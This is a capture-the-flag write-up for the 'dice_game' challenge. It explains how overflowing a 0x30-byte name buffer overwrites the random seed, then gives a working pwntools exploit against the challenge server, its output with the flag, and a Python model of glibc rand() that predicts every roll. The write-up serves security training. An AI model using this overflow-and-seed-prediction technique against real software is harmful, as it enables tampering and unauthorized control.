Preface
This challenge is cut from the same cloth as guess_num in the beginner section: both rely on an overflow to overwrite the random seed, so that writeup is worth a look.
0x01 Finding the vulnerability
The overall program flow is simple: guess the dice roll correctly 50 times in a row and you get the flag.
In reality, buf is only allocated 0x30 bytes, so writing 0x40 bytes of data into it runs past buf and overwrites seed.
Since the program seeds its generator from that variable, forcing it to a known value (1 below) lets us replay the exact rand() sequence locally with the same libc and answer every round correctly.
0x02 exp
#!/usr/bin/env python
from pwn import *
from ctypes import *
# context.log_level = "debug"
io = remote("111.198.29.45", 53501)
# io = process("./dice_game")
libc = cdll.LoadLibrary("./libc.so.6")   # same libc as the target, so rand() produces the same sequence
payload = b"a" * 0x40 + p64(1)           # fill buf, then overwrite seed with 1
io.recvuntil(b"your name: ")
io.sendline(payload)
libc.srand(1)                            # replay the generator with the seed we forced
for i in range(50):
    num = libc.rand() % 6 + 1            # the game's roll: rand() % 6 + 1
    io.recvuntil(b"point(1~6): ")
    io.sendline(str(num).encode())
io.interactive()
kk@ubuntu:~/Desktop/black/GFSJ/dice_game$ python exp.py
[+] Opening connection to 111.198.29.45 on port 53501: Done
[*] Switching to interactive mode
You win.
Congrats aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�I
cyberpeace{TryTry口喜口喜}
Bye bye!
[*] Got EOF while reading in interactive
$
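To show why a forced seed makes all 50 rolls predictable without needing the target's libc.so.6 on hand, here is an added example (not part of the original writeup) that models glibc's srand()/rand() in pure Python and rebuilds the payload layout from the script above; the 0x40 offset and the "rand() % 6 + 1" roll are taken from the page, the function names are my own.

```python
import struct

# Added example: pure-Python model of glibc's rand()/srand()
# (the TYPE_3 additive feedback generator used by the target's libc).

def glibc_rand_sequence(seed, count):
    """Return the first `count` values glibc rand() yields after srand(seed)."""
    seed &= 0xffffffff
    if seed == 0:               # glibc replaces a zero seed with 1
        seed = 1
    if seed >= 0x80000000:      # the seed is treated as a signed 32-bit int
        seed -= 0x100000000
    r = [seed]
    for i in range(1, 31):      # LCG warm-up: 16807 * r[i-1] mod (2^31 - 1)
        r.append((16807 * r[i - 1]) % 2147483647)
    for i in range(31, 34):     # the first three words are reused once
        r.append(r[i - 31])
    for i in range(34, 344):    # srand() discards 310 outputs
        r.append((r[i - 31] + r[i - 3]) & 0xffffffff)
    out = []
    for i in range(344, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & 0xffffffff)
        out.append(r[i] >> 1)   # rand() returns the top 31 bits
    return out

def predict_dice(seed, rounds=50):
    """Rolls the game expects: rand() % 6 + 1, exactly as the exploit computes."""
    return [v % 6 + 1 for v in glibc_rand_sequence(seed, rounds)]

def build_payload(seed=1, buf_to_seed=0x40):
    """Name input that fills buf and lands `seed` on the seed variable.
    The 0x40 padding and little-endian 8-byte value mirror the exploit script."""
    return b"a" * buf_to_seed + struct.pack("<Q", seed)

if __name__ == "__main__":
    print(build_payload())
    print(predict_dice(1))
```

With seed 1 the first five rand() values are the familiar 1804289383, 846930886, 1681692777, 1714636915, 1957747793, which map to the rolls 2, 5, 4, 2, 6; any program whose seed an attacker can fix this way has no randomness left to defend.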